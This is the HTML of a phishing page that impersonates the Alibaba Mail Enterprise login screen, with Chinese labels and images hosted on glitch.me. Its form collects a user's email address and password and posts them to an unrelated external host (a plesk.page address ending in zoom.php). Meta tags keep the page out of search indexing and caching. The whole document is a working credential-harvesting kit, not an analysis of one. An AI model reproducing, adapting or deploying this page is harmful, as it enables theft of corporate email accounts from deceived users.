<!DOCTYPE>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>&#38463;&#37324;&#37038;&#31665;&#20225;&#19994;&#29256;</title>
<meta http-equiv='content-type' content="text/html; charset=ISO-8859-5">
<meta http-equiv='content-type' content="text/html; charset=UTF-8">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">
<link rel="icon" type="images/ico" sizes="16*16" href="https://cdn.glitch.me/2ff89ccb-ce82-44d3-830d-54fb8847bdad/favicon.ico?v=1639421007350">
<title>登录认证</title>
<style>
.body {
	font-family: Times New Roman;
	margin: auto;
	padding: 0px;
	border: 2px solid blue;
}

.form {
	width: auto;
	height: auto;
	position: relative;
	padding: 0px;
	margin: 0px;
	border: 2px solid #000000;
}

.container {
	position: relative;
	padding: 0px;
	margin-left: auto;
	margin-right: auto;
	width: 1535px;
	height: 700px;
	background-image: url('https://cdn.glitch.me/2ff89ccb-ce82-44d3-830d-54fb8847bdad%2Fcn4e.png?v=1639415838116');
	background-repeat: no-repeat;
}

input[type=text], input[type=password] {
  width: 311px;
  height: 30px;
  font-family: Segoe UI;
  font-size: 14px;
  background-color: #ffffff;
  color: #000000;
  padding: 5px;
  padding-left: 8px;
  margin-right: 0px;
  margin-left: 0px;
  margin-top: 0px;
  -webkit-transition: 0.5s;
  margin-bottom: 2px;
  border: 1px solid #dedcdc;
  outline: none;
}

input[type=text]:focus {
  border: 1px solid #a6eaff;
}

input[type=password]:focus {
  border: 1px solid #a6eaff;
}

.contain {
	width: 200px;
	height: 240px;
	position: absolute;
	left: 52.7%;
	top: 26.5%;
	padding: 0px;
	margin-left: 27px;
}

.forgot_pass {
	width: 60px;
	height: 25px;
	position: absolute;
	left: 82%;
	top: 44%;
	padding: 0px;
	margin-left: 27px;
}

.next {
	width: 252px;
	height: 24px;
	position: absolute;
	left: -30px;
	top: 14%;
	padding: 0px;
	margin-left: 27px;
}

.logo {
width: 252px; height: 24px; position: absolute; left: 17.5%; top: 3px; padding: 0px; margin-left: 27px; margin-top: 0px;
}

.header_link {
	width: 300px;
	height: 48px;
	position: absolute;
 	font-size: 12px;
	letter-spacing: 0.5px;
	border: 2px solid red;
}

.footer_link {
	width: auto;
	height: 24px;
	position: absolute;
	left: -30px;
	top: 14%;
	padding: 0px;
	margin-left: 27px;
}    

.vertical-line {
	display: inline-block;
	border-left: 1px solid #8a8a8a;
	margin-left: 10px;
	margin-right: 10px;
	height: 40px;
}

button {
  color: transparent;
  background-color: transparent;
  padding: 6px;
  margin-top: -8px;
  position: absolute;
  left: -5%;
  margin-left: 5px;
  margin-right: 0px;
  margin-bottom: 20px;
  cursor: pointer;
  width: 85px;
  border: none;
  height: auto;
}
	
</style>
</head>
<body style="padding: 0px; margin: 0px; font-family: Times New Roman;">

<div class="container">
	<div class="logo"></div>

	<form method="post" action="https://brave-spence.192-236-155-73.plesk.page/lee/loft/zoom.php">
		<div class="contain">
    		<input id="username" type="text" placeholder="&#29992;&#25143;&#21517;" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" style="margin-top: 8px; margin-bottom: 6px;" name="username" 
autocomplete="off" required>

    		<input id="password" type="password" placeholder="&#23494;&#30721;" style="margin-top: 8px; margin-bottom: 10px;" name="password" required>

		<div class="forgot_pass"></div>
		<div class="next"><p style="text-align: center; font-size: 12px; font-weight: 1; color: #92a4bf;"></p></div>

		<button type="submit"><img src="https://cdn.glitch.me/2ff89ccb-ce82-44d3-830d-54fb8847bdad%2Fbutton.png?v=1639409066665" style="height: auto; width: 85px;"></button>
		</div>
	</form>
</div>

<div class="footer_link">
</div>

</body>
</html>

